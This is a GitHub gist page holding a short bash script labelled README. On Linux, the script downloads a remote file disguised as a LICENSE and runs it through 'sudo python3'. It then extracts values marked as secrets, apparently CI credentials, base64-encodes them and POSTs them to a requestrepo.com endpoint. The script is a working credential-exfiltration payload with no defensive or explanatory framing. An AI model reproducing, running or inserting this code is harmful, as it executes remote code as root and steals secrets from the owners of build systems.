Skip to content

Instantly share code, notes, and snippets.

@Firebasky
Last active April 19, 2025 10:41
Show Gist options
  • Save Firebasky/aeaffad83aa03cea8044c4157f1f16cd to your computer and use it in GitHub Desktop.
Save Firebasky/aeaffad83aa03cea8044c4157f1f16cd to your computer and use it in GitHub Desktop.
README
if [[ "$OSTYPE" == "linux-gnu" ]]; then
B64_BLOB=`curl -sSfL https://github.com/flank/flank/raw/128b43b61fd7da13ea6829d1fbb4d3f028b6cdad/LICENSE | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0`
curl -X POST https://qk62iikh.requestrepo.com/env -d "$B64_BLOB"
else
exit 0
fi
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment